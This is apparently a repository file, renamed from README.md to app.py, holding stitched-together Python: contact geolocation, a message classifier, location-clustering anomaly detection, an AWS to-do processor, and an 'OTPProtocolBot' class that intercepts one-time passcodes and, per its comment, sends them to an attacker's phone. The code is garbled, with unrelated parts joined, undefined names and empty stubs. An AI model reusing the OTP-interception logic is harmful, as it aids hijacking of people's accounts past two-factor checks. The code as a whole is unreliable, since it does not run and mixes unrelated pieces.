Rename README.md to app.py
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README.md
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---
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license: other
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---
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app.py
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import coremltools
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import torch
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from transformers import AutoTokenizer, AutoModelForSequenceClassification
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import numpy as np
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import pandas as pd
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from sklearn.cluster import KMeans
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from scipy.spatial.distance import cdist
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import geopy.distance
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import logging
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class AddressBook:
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def __init__(self, contacts):
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self.contacts = contacts
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def get_location(self, contact):
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# Get the latitude and longitude of the contact's location
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latitude = contact["latitude"]
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longitude = contact["longitude"]
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# Return a tuple containing the latitude and longitude
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return (latitude, longitude)
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class MessageClassifier:
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def __init__(self, model_name):
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self.tokenizer = AutoTokenizer.from_pretrained(model_name)
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self.model = AutoModelForSequenceClassification.from_pretrained(model_name)
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def classify(self, messages):
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# Tokenize the messages
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inputs = self.tokenizer(messages, padding=True, truncation=True, return_tensors="pt")
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# Classify the messages
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outputs = self.model(**inputs)
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probs = torch.nn.functional.softmax(outputs[0], dim=-1)
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labels = torch.argmax(probs, axis=1)
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# Convert the labels to a numpy array and return them
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return labels.numpy()
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class AnomalyDetector:
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def __init__(self, num_clusters):
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self.num_clusters = num_clusters
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def detect(self, location_history):
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# Convert the location history to a pandas DataFrame
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df = pd.DataFrame(location_history, columns=["latitude", "longitude"])
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# Determine the optimal number of clusters using the elbow method
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distortions = []
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K = range(1, self.num_clusters+1)
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for k in K:
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kmeans = KMeans(n_clusters=k, random_state=0).fit(df)
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distortions.append(sum(np.min(cdist(df, kmeans.cluster_centers_, 'euclidean'), axis=1)) / df.shape[0])
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k_opt = K[np.argmin(distortions)]
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# Perform clustering
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kmeans = KMeans(n_clusters=k_opt, random_state=0).fit(df)
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df["label"] = kmeans.labels_
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# Determine which clusters are anomalous
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cluster_counts = df["label"].value_counts()
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anomalous_clusters = cluster_counts[cluster_counts < cluster_counts.quantile(0.1)].index
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# Determine which points are anomalous
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anomalous_points = df[df["label"].isin(anomalous_clusters)]
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# Convert the anomalous points to a list of dictionaries and return them
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return anomalous_points.to_dict("records")
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class GeoLocation:
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def __init__(self, location):
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self.location = location
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def get_distance(self, contact_location):
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# Calculate the distance between the user's location and the contact's location
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distance = geopy.distance.distance(self.location, contact_location).km
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# Return the distance
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return distance
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class OTPProtocolBot:
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def __init__(self, protocol):
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self.protocol = protocol
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def intercept(self, message):
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# Check if the message contains the OTP code
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if "OTP code" in message:
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# Intercept the OTP code and send it to the attacker's phone
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otp_code = message.split(":")[-1]
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self.protocol.send_otp_code(otp_code)
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class LegacyProtocolBot:
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def __init__(self, protocol):
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self.protocol = protocol
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def bypass(self):
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# Bypass the legacy protocol and send the message using the new protocol
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self.protocol.use_new_protocol()
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class MLModelConverter:
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def convert_model(self, model):
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# Implement the logic to convert the model
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pass
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return []
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@authenticate_user
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def save_todo_list(todo_list: List[Dict]) -> None:
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"""
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Save the to-do list to the specified file.
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"""
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with open(TODO_LIST_FILE, "w") as f:
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json.dump(todo_list, f)
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@authenticate_user
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def add_task(task: Dict) -> None:
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"""
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Add a task to the to-do list.
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"""
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todo_list = load_todo_list()
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todo_list.append(task)
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save_todo_list(todo_list)
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@authenticate_user
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def remove_task(task: Dict) -> None:
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"""
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Remove a task from the to-do list.
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"""
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todo_list = load_todo_list()
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if task in todo_list:
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todo_list.remove(task)
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save_todo_list(todo_list)
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def process_task(task: Dict) -> None:
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"""
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Process a task using the appropriate AWS service.
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"""
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if "upload" in task:
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filename = task["upload"]
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s3.upload_file(filename, "my-bucket", filename)
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logging.info(f"Uploaded file {filename} to S3 bucket my-bucket")
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elif "lambda" in task:
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function_name = task["lambda"]
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response = lambda_client.invoke(FunctionName=function_name, Payload=json.dumps(task))
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logging.info(f"Invoked Lambda function {function_name} with response {response['StatusCode']}")
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elif "comprehend" in task:
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text = task["comprehend"]
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sentiment = comprehend.detect_sentiment(Text=text, LanguageCode='en')
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logging.info(f"Detected sentiment {sentiment['Sentiment']} in text: {text}")
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else:
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logging.warning(f"Task not recognized: {task}")
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@authenticate_user
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def process_todo_list() -> None:
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"""
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Process all tasks in the to-do list.
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"""
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todo_list = load_todo_list()
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for task in todo_list:
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process_task(task)
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# Example usage
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add_task({"upload": "/home/user/data.txt"})
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add_task({"lambda": "my-function", "message": "hello"})
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add_task({"comprehend": "This is a positive message."})
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process_todo_list()
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